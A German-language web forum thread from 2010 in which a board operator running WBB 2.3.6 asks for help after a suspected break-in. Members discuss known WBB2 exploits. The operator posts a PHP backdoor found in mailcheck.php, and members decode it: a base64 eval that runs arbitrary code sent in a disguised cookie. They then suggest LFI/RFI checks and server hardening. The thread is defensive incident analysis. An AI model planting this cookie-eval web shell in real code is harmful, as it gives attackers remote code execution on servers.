xeno Moderator Registriert seit: 09.09.04 Likes: 65	Über eine aktivierte Suchfunktion für Nicht-Member lies sich das WBB2 recht einfach übernehmen. Exploits dafür kursieren überall im Netz. Damit ist es möglich, an den (MD5) Passworthash aller User zu kommen, und den in ne Datenbank zu werfen ist kein großer Akt. Es wäre also in der Tat möglich, daß dein Forum angegriffen wurde. Schau mal im AdminCP nach, ob Zugriffe stattgefunden haben, die nicht von dir sind. Wenn ich mich recht erinnere, werden diese gelogt und angezeigt. __________________ http://www.thehappy.de/~xeno/ http://www.blogthon.de/

08.03.10, 23:12	#12 (permalink)
master-protic Themenstarter Registriert seit: 08.03.10 Likes: 0	Zitat von easteregg sollte diese lücke aber nicht gepatched sein? Dies wurde durch die Version pl2 gepatcht In einer Datei namens mailcheck.php wurde folgender code gefunden <?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUF NFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJ RVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email..."; ?> Tobi Geändert von master-protic (09.03.10 um 17:47 Uhr)

08.03.10, 22:49	#5 (permalink)
master-protic Themenstarter Registriert seit: 08.03.10 Likes: 0	Hallo Es ist das Wbb 2.3.6 pl2 aktuellste Version Anschließend kam die 3 Version die aber komplett anders ist Tobi

08.03.10, 22:57	#8 (permalink)
master-protic Themenstarter Registriert seit: 08.03.10 Likes: 0	Hallo Diese Hacks sind alle auf dem aktuellen Stand! Tobi

08.03.10, 23:08	#11 (permalink)
master-protic Themenstarter Registriert seit: 08.03.10 Likes: 0	Hallo Galerie V3.5.0 ©2003/2007 by Trooper User-Map V2.3 © Viktor Security System Premium 3.0.1 premium HM-Portal V3.1.4 by Old_Surehand / Trooper JGS-Datenbank Version 3.0.0 © 2002-2010 ww Tobiw.jgs-xa.de

10.03.10, 18:04	#13 (permalink)
easteregg Member of Honour Registriert seit: 14.09.07 Likes: 60	die wurde scheinbar überschreiben, eben durch eine lfi oder rfi. ist nur die frage wo die sicherheitslücke dazu ist. schau mal nach ob irgendwo daten includiert werden, die vorher nicht sauber abgefragt werden. dann schau mal in den logs nach, ob da irgendwie code durch fehlende daten eingeschleust wurde, und anschliesend die logs includiert worden (lfi) dann schau mal nach - wenns nen root ist - ob die php einstellungen sauber sind, sprich ob die scripte auch nur in ihren verzeichnissen lesen dürfen, ob der apache auch niht als root läuft, ob ein includieren via http erlaubt ist etc pp.... register globals auf off ... das übliche! __________________ » Flattr mich! - Wenn dir mein Beitrag geholfen hat! « <\| 2 AMD Opterons 2384@ 8x3,2ghz \| Tyan S2915 \| 10GB \| 2x 8800GT \| 8400GS \| Dell 3008WFP + 2x2007FP \|>

10.03.10, 18:19	#14 (permalink)
xeno Moderator Registriert seit: 09.09.04 Likes: 65	Da steht bloß: Code: if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;} Da ist nichts gefährliches dran. Oder überseh ich was? __________________ http://www.thehappy.de/~xeno/ http://www.blogthon.de/

10.03.10, 18:41	#15 (permalink)
easteregg Member of Honour Registriert seit: 14.09.07 Likes: 60	der führt den inhalt des cookies aus. sprich du kannst da beliebigen code reinbringen indem du den per cookie übermittelst... das is mega gefährlich ;D __________________ » Flattr mich! - Wenn dir mein Beitrag geholfen hat! « <\| 2 AMD Opterons 2384@ 8x3,2ghz \| Tyan S2915 \| 10GB \| 2x 8800GT \| 8400GS \| Dell 3008WFP + 2x2007FP \|>

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln


HaBo Ads HaBOT

[HaBo]

Javascript Code in Webseite